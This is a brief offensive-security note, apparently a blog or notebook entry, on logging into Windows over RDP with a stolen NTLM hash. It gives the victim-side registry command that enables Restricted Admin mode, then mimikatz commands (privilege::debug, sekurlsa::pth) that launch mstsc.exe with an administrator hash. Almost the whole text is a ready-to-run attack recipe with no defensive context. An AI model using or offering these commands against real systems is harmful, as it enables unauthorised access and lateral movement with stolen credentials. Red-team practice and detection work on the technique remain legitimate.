NTLM Login RDP
Victim Machine
shell REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
shell REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"Attack Machine
privilege::debug
sekurlsa::pth /user:administrator /domain:DESKTOP-KU881GO /ntlm:exxxxxxxxxxxxxxxxxxxxx2 "/run:mstsc.exe /restrictedadmin"NTLM Login RDP
http://localhost:8090/archives/ezSCixsF